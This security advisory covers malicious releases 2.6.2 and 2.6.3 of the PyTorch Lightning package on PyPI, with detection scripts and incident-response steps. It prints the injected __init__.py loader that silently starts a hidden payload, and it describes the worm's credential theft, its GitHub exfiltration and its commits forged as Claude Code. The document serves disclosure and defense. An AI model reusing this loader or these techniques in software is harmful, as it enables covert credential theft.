Socket Research,
Aikido Security,
and StepSecurity all confirmed today that two new releases of the
popular PyTorch Lightning Python package (lightning
on PyPI) are malicious. Versions 2.6.2 and
2.6.3, both published April 30, 2026, contain
a credential-stealing payload injected directly into the
package's __init__.py, which means the malware runs
on any import lightning. The earlier
2.6.1 release (January 30, 2026) was not identified
as malicious in the initial reports, but the entire
lightning project is currently under PyPI
quarantine and not installable from PyPI until the review
resolves; reinstall guidance below uses internal artifacts and
verified lockfile caches in preference to PyPI itself.
Socket's AI scanner flagged the malicious versions within
eighteen minutes of publication; PyPI has reportedly quarantined
the project. The campaign is being tracked as "Mini
Shai-Hulud," a worm-family extension of the Bitwarden
CLI and SAP npm compromises from earlier this week, which Socket
links via shared technical signatures to Checkmarx, Telnyx,
LiteLLM, and the Aqua Security Trivy compromise. Lightning's
maintainers say they "are aware of the issue and are actively
investigating."
Framing note: this is best understood not as a code vulnerability in Lightning itself but as a compromised package-distribution incident involving malicious PyPI releases. No CVE has been assigned at the time of writing. The response is package hygiene plus credential rotation, not patching.
The lightning package receives hundreds of
thousands of downloads per day. The malicious versions were
live on PyPI for an unknown but non-trivial window before
quarantine. The malware runs on import (not just during
install) and ships an 11 MB obfuscated JavaScript payload
that steals SSH keys, cloud credentials, GitHub and npm
tokens, MCP / Claude Code configuration files, cryptocurrency
wallets, and VPN credentials, then encrypts the stolen data
and exfiltrates it through attacker-created or
attacker-accessible public GitHub repositories under the
victim's own account. It also self-propagates by
modifying the developer's local npm packages with malicious
postinstall hooks. Treat any host that imported
2.6.2 or 2.6.3 as fully compromised.
The injected code in __init__.py:
def _run_runtime() -> None:
    _runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
    _start = os.path.join(_runtime_dir, "start.py")
    if os.path.exists(_start):
        subprocess.Popen(
            [sys.executable, _start],
            cwd=_runtime_dir,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )

threading.Thread(target=_run_runtime, daemon=True).start()
Standard tradecraft: detached subprocess, suppressed
stdout / stderr, daemon thread, hidden directory.
Identical structural pattern to the
Bitwarden CLI
compromise (bw1.js +
~/.checkmarx/mcp/mcpAddon.js dropper),
Bun-based JavaScript execution and all.
Confirmed by Socket, Aikido, and StepSecurity:
lightning 2.6.2 and 2.6.3 contain a malicious
_runtime/ directory and modified
__init__.py that auto-executes a credential-stealer
on import. Same campaign infrastructure as the SAP npm
compromise (April 29) and the Bitwarden CLI compromise
(April 23).
Reported by The Hacker News and Cyber Kendra:
PyPI has quarantined the lightning project. A
community member's tracking issue (#21689 in Lightning-AI's
repository) was closed within one minute by an account named
pl-ghost, which posted a "SILENCE DEVELOPER" meme
in response, behavior that strongly suggests the project's
GitHub account itself is compromised. Lightning AI maintainers
have separately acknowledged: "we are aware of the issue
and are actively investigating."
Attribution context: Socket attributes the campaign to the "Mini Shai-Hulud" worm family, an extension of the broader Shai-Hulud / TeamPCP-adjacent cluster that has been linked through shared technical signatures to recent Checkmarx, Bitwarden, Telnyx, LiteLLM, and Aqua Security Trivy compromises. As with the xinference and Bitwarden incidents, treat the campaign-association as the researchers' call based on tradecraft overlap, not settled actor attribution.
Unclear at time of writing: precise window
during which 2.6.2 / 2.6.3 were pullable from PyPI; whether
additional Lightning AI packages on the same release pipeline
(pytorch-lightning, lightning-utilities,
lightning-cloud, etc.) are affected; how the
attacker obtained Lightning AI's PyPI publishing credentials
(the prevailing hypothesis across reporting is GitHub account
compromise, but it has not been confirmed by Lightning AI yet);
formal incident bulletin from Lightning AI.
Attribution remains fluid. Current reporting connects the behavior to the Mini Shai-Hulud campaign based on shared payload tradecraft (Bun bootstrapper, GitHub-public-repo exfiltration, RSA-2048 encryption, Claude Code commit impersonation). Claims circulating around TeamPCP and LAPSUS$, including a PGP-signed message attributed to TeamPCP, should be treated as unverified unless and until independently confirmed by trusted incident-response sources. Socket has explicitly noted it has not verified the PGP signature or independently confirmed the claimed relationships.
Why this one matters more than most
lightning is the high-level training framework
most ML practitioners build on top of PyTorch. It receives
hundreds of thousands of downloads per day and millions per
month. The population of machines that import it is exactly
the population that holds the highest-value collateral for
this kind of campaign: model-training rigs with cloud
credentials for compute, AI infrastructure deployments with
vault tokens, MLOps CI runners with broad publishing scope,
and developer workstations with the entire "modern AI/ML
developer" credential surface (HuggingFace, Weights &
Biases, GitHub, npm, AWS / GCP / Azure, MCP / Claude Code).
The Claude-Code-impersonation detail is worth flagging separately. Per Socket: every poisoned commit pushed by the worm is authored using a hardcoded identity designed to impersonate Anthropic's Claude Code. That's a deliberate camouflage choice: AI-authored commits are increasingly common in repositories using Claude Code or Cursor, so a malicious commit attributed to Claude Code blends in with legitimate AI-assisted activity in audit logs. Worth knowing for any team that uses AI coding tools in production.
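One way to surface such commits is to search git history for the impersonated author identity. A minimal sketch, assuming git is on PATH; the exact hardcoded identity string is not reproduced here, so the author pattern is a placeholder you would replace with the identity from the researchers' IOC list:

```python
import subprocess

def find_commits_by_author(repo_path: str, author_pattern: str) -> list[str]:
    """List commits across all refs whose author matches the given pattern.

    author_pattern is a placeholder: substitute the impersonated identity
    published in the researchers' IOCs.
    """
    out = subprocess.run(
        ["git", "-C", repo_path, "log", "--all",
         f"--author={author_pattern}", "--format=%H %an <%ae>"],
        capture_output=True, text=True, check=True,
    )
    return [line for line in out.stdout.splitlines() if line]
```

Cross-reference every hit against the environments where your team actually runs Claude Code; a matching author pushed from a host that never had the tool configured is the signal.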
How this fits the campaign
Same playbook, different package, eight days in a row:
- April 22, Checkmarx KICS on Docker Hub + cx-dev-assist/ast-results on Open VSX. C2: audit.checkmarx[.]cx.
- April 22, xinference on PyPI (versions 2.6.0–2.6.2). Different exfil host, similar tradecraft, attribution contested.
- April 23, Bitwarden CLI on npm (version 2026.4.0). Same C2 as Checkmarx, identified as "Shai-Hulud: The Third Coming" via embedded malware branding.
- April 29, SAP npm packages + intercom-client 7.0.4 on npm. Same Bun-based payload pattern, "Mini Shai-Hulud" branding.
- April 30, PyTorch Lightning on PyPI (2.6.2, 2.6.3). Same Bun-based payload pattern, this time crossing from npm back to PyPI.
Two patterns to flag for operators. First, the campaign now has cross-ecosystem reach: the same toolkit hits npm and PyPI within 24 hours. Second, the targets are increasingly AI/ML- and CI/CD-adjacent: a security scanner, a password-manager CLI, an inference runtime, an SDK, and now a model-training framework. The attacker is picking high-trust packages whose installation footprint runs in credential-rich environments.
Am I affected?
If lightning 2.6.2 or 2.6.3 was installed
and imported on any developer workstation, CI
runner, training host, MLOps pipeline, container image,
notebook environment, or Kubernetes pod, treat the host as
fully compromised.
Installed with no evidence of import means lower
confidence of execution, not "safe." The malicious
code runs from __init__.py, which means
pip install alone does not trigger it, but
any Python process on the host that imports
lightning does. ML / Python tooling imports
packages implicitly all the time: notebook startup, IDE
test discovery, REPL sessions, CI test jobs, application
startup paths, sidecar processes, and so on. Before
downgrading severity for an install-only host, confirm via
process logs, shell history, notebook server logs,
container runtime logs, and CI job logs that no Python
process actually loaded the package. If you can't confirm
a clean import history, treat as compromised.
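One cheap heuristic when logs are incomplete: compiled bytecode inside the installed package. A minimal sketch, assuming a conventional site-packages layout; presence of bytecode strongly suggests an import happened, but absence proves nothing (e.g. if the interpreter ran with bytecode caching disabled):

```python
import pathlib

def lightning_import_evidence(site_packages: str) -> bool:
    """True if compiled bytecode exists for lightning/__init__.py,
    i.e. some interpreter imported the package at least once."""
    cache = pathlib.Path(site_packages) / "lightning" / "__pycache__"
    return cache.is_dir() and any(cache.glob("__init__.*.pyc"))
```

Run it against every site-packages and venv path found by the directory search above; treat any True as confirmation of execution.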
Quick checks
On any host you suspect:
pip show lightning 2>/dev/null | grep -E '^Version:'
Or to find every installed copy across user, system, and venv paths:
find / -name "lightning" -type d 2>/dev/null | xargs -I{} sh -c 'test -d "{}/_runtime" && echo "FOUND: {}"'
The presence of a _runtime/ subdirectory inside
any installed lightning package is the highest-signal
indicator: legitimate Lightning releases do not contain this
directory. Search every Python environment, including
uv and poetry caches, conda envs,
Docker layer caches, and CI runner working directories.
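To check an environment's installed version without triggering the payload, query the package metadata instead of importing the package. A minimal sketch: importlib.metadata reads the dist-info directory on disk and, unlike import lightning, does not execute the package's __init__.py.

```python
from importlib import metadata

MALICIOUS_VERSIONS = {"2.6.2", "2.6.3"}

def lightning_status() -> str:
    """Classify the installed lightning version without importing it."""
    try:
        version = metadata.version("lightning")  # reads dist-info only
    except metadata.PackageNotFoundError:
        return "not installed"
    return f"MALICIOUS: {version}" if version in MALICIOUS_VERSIONS else f"installed: {version}"
```

Run it once per interpreter / venv; each environment has its own dist-info.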
Search lockfiles and build logs across the whole environment for any reference to the malicious versions:
grep -rE '(^|[^A-Za-z0-9_-])lightning[^A-Za-z0-9]{1,6}2\.6\.[23]\b' . 2>/dev/null
Response, if you imported 2.6.2 or 2.6.3
- Isolate the host and the PyPI / npm caches. Pull affected hosts off the network or block outbound traffic. Run pip uninstall lightning in every affected environment, then purge package caches: pip cache purge, rm -rf ~/.cache/uv, and clear conda / poetry caches per their own commands. Rebuild any container images that were built off the malicious versions. Remove adjacent Lightning packages (pytorch-lightning, lightning-utilities, etc.) only if your lockfile / environment requires a full dependency reset, or if later advisories specifically name them; the confirmed malicious package is lightning on its own. Prefer rebuilding the environment from a known-good lockfile rather than ad hoc partial cleanup.
- Reinstall from a known-good source, not PyPI. The lightning project is currently quarantined on PyPI, so direct reinstall from PyPI is not possible during admin review. Prefer, in this order: (1) a verified internal artifact you already know is clean, (2) a lockfile-pinned wheel from a cache that predates the malicious publishes, (3) a maintainer-confirmed release once Lightning AI publishes one. The pre-incident release 2.6.1 was not identified in the initial malicious-version reports, but until the project quarantine and any maintainer advisory resolve, do not assume any specific version is safe to pull directly from PyPI; treat 2.6.1 as the rollback target only if you have it from a trusted source already.
- Rotate every credential class the payload targets. Per Aikido's analysis, the payload harvests: SSH private keys; shell histories for bash, zsh, Python, Node, MySQL, psql; .env files; git credentials; AWS / GCP / Azure credentials; Kubernetes and Helm configs; Docker credentials; npm tokens; MCP / Claude Code configuration files; cryptocurrency wallets (Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic, Ledger); VPN credentials (NordVPN, ProtonVPN, CyberGhost, Windscribe, OpenVPN); Discord / Slack session data. For an ML host, also rotate HuggingFace tokens, Weights & Biases API keys, Anthropic / OpenAI API keys, and any model-provider credentials in the environment.
- Hunt your GitHub organization for malicious commits and unauthorized public repositories. Per Socket, the worm creates public repositories under the victim's account to host RSA-2048-encrypted exfiltrated data, and also commits poisoned files to branches the affected token has write access to. Check every account that had a token on an affected host for: any newly created public repo (especially unfamiliar names); commits authored by what appears to be Claude Code but originated from an environment where Claude Code is not in use; and silent overwrites of files. The worm's operation is an upsert: it overwrites without prechecking, so a legitimate file may have been replaced with a poisoned version. Audit every branch the affected token could write to, not only the default branch. Look specifically for planted files at .claude/router_runtime.js, .claude/settings.json, .github/workflows/format-check.yml, and .vscode/payloads. Per Socket, the worm targets up to 50 branches per writable repository.
- If you publish npm packages, audit them. The worm modifies local npm packages on the victim's machine: it adds a postinstall hook to package.json that invokes the malicious payload, bumps the patch version, and repacks the .tgz tarball. If a developer on an affected host later ran npm publish, those compromised versions are now live on npm. For every npm package your org publishes, audit recent versions for unexpected postinstall entries and unexpected version bumps. Yank or deprecate anything that looks wrong.
- Hunt for the worm's host-side artifacts. Look for any directory called _runtime/ inside an installed lightning package. Look for unexpected Bun runtime installations on hosts that don't otherwise use Bun. Look for the file hashes in the IOC block on disk and, if your EDR captured them, in process memory. Inspect outbound network logs for connections to GitHub from python processes that don't normally contact GitHub.
- Rebuild, don't clean. For any production host, training rig, or CI runner, wipe and rebuild from known-clean media. The worm's exfiltration is loud (encrypted blobs to public repos) but its persistence surface, including any second-stage tooling the 11 MB JS payload may have dropped, is not fully characterized in public reporting yet. Don't try to clean piecewise.
- Push the IOCs into your detection. Load the SHA256 hashes for router_runtime.js and start.py into your EDR and file-integrity monitoring. Add SIEM detections for: presence of _runtime/ directories inside Python packages, unexpected Bun runtime invocations from Python processes, creation of public GitHub repositories under organization accounts, and commits authored as Claude Code from environments where Claude Code is not in use.
- Document the rotation. Keep a record of every credential rotated and when. Standard incident hygiene: if a downstream incident surfaces in the next weeks (and given the campaign's velocity, more compromises are likely), you want to be able to reconstruct your rotation timeline cleanly.
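The host-side artifact hunt above can be sketched as a single triage pass. A minimal sketch, assuming you substitute the researchers' published SHA256 IOCs for the placeholder set below (the placeholders are not real hashes), and accepting that it hashes each file whole in memory:

```python
import hashlib
import os

# Placeholders only: replace with the SHA256 IOCs published by Socket / Aikido
IOC_SHA256 = {
    "<sha256-of-router_runtime.js>",
    "<sha256-of-start.py>",
}

def triage(root: str) -> list[tuple[str, str]]:
    """Walk a tree; flag lightning/_runtime directories and IOC hash matches."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # A _runtime/ directory inside an installed lightning package is
        # the highest-signal indicator for this incident.
        if os.path.basename(dirpath) == "lightning" and "_runtime" in dirnames:
            hits.append(("runtime-dir", os.path.join(dirpath, "_runtime")))
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
            except OSError:
                continue  # unreadable file; skip rather than abort the sweep
            if digest in IOC_SHA256:
                hits.append(("ioc-hash", path))
    return hits
```

Point it at /, at container overlay directories, and at CI runner workspaces; any hit means the host moves to the compromised bucket.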
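Similarly, the npm-publishing audit can start with a local scan for postinstall hooks. A sketch: it flags every package.json with a postinstall script for manual review. postinstall has plenty of legitimate uses, so a hit is a lead, not a verdict.

```python
import json
import pathlib

def find_postinstall_hooks(root: str) -> list[tuple[str, str]]:
    """Return (path, postinstall command) for every package.json under root."""
    flagged = []
    for pkg in pathlib.Path(root).rglob("package.json"):
        try:
            scripts = json.loads(pkg.read_text()).get("scripts", {})
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or malformed manifest; skip
        if isinstance(scripts, dict) and "postinstall" in scripts:
            flagged.append((str(pkg), scripts["postinstall"]))
    return flagged
```

Compare each flagged manifest against the last version you knowingly published; an unexplained postinstall plus a patch-version bump matches the worm's repacking behavior.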
If your project depends on lightning directly
or transitively (LangChain integrations, model-serving
frameworks, training-as-a-service products, internal MLOps
platforms), audit your lockfiles and recent build logs for
2.6.2 / 2.6.3. A pip install -U during the
exposure window could have pulled the malicious version
into a build that was then signed and shipped. If any of
your release pipelines could have run with the malicious
Lightning installed, treat the resulting artifacts as
suspect until proven otherwise.
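That lockfile audit can be sketched in Python for when a grep across heterogeneous lockfile formats gets noisy. The regex requires the bare package name lightning, so pytorch-lightning at the same version (not identified as malicious in the initial reports) does not trigger a hit; the lockfile name set is an assumption you should extend to whatever your pipelines actually emit:

```python
import pathlib
import re

# Bare "lightning" followed by a short version specifier for 2.6.2 / 2.6.3
MALICIOUS_RE = re.compile(r'(?<![A-Za-z0-9_-])lightning[^A-Za-z0-9]{1,6}2\.6\.[23]\b')

def scan_lockfiles(root: str) -> list[str]:
    """Return lockfile paths under root that reference the malicious versions."""
    names = {"requirements.txt", "constraints.txt", "poetry.lock",
             "uv.lock", "Pipfile.lock"}
    hits = []
    for path in pathlib.Path(root).rglob("*"):
        if path.name in names and path.is_file():
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            if MALICIOUS_RE.search(text):
                hits.append(str(path))
    return hits
```

Run it over every repository and build workspace; a hit means the exposure-window question above applies to that pipeline's artifacts.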
The broader pattern
Three observations after eight days of this campaign that are worth flagging:
First, the targeting is now overtly AI/ML-flavored.
xinference (model-serving), Bitwarden CLI
(secrets-adjacent dev tooling), and now Lightning (the
dominant PyTorch training framework) all sit at the
credential-rich layer of an AI/ML stack. The credential set
this worm targets, including Claude Code and MCP
configuration files specifically, is a deliberate
pick. AI-developer credentials are now treated as a
high-value harvest, not an afterthought.
Second, the Claude Code commit-author impersonation is a new tradecraft element. AI-authored commits are increasingly normal in active repositories, which means a malicious commit signed as Claude Code reads as legitimate to most reviewers and audit tools. If your organization uses AI coding tools, your detection rules should now include "commits attributed to AI tools but pushed from environments where those tools are not configured." Trust-but-verify on AI-authored activity is the new baseline.
Third, the cross-ecosystem velocity is real. The same operator (or operator family) compromised SAP npm packages on April 29 and PyTorch Lightning on PyPI on April 30, with overlapping tradecraft and shared payload structure. Defenses that are scoped to a single ecosystem (npm-only, PyPI-only) are increasingly under-scoped. Tools like Aikido Safe Chain, Socket, and Snyk that watch both registries are doing the right thing structurally; orgs running their own detection should match that breadth.
If lightning 2.6.2 or 2.6.3 was imported on
any host in your environment: isolate it, purge package
caches, reinstall only from a verified internal artifact or
trusted lockfile cache (the project is quarantined on PyPI;
do not pull directly from PyPI during the quarantine), rotate every developer / cloud / ML / npm / Claude-Code
credential the host touched, hunt your GitHub org for
unauthorized public repos and Claude-Code-impersonating
commits, audit any npm packages you publish for unexpected
postinstall hooks, and rebuild affected
hosts. The malware runs on import, not just on install,
so the moment any Python process imported it, the host
is compromised.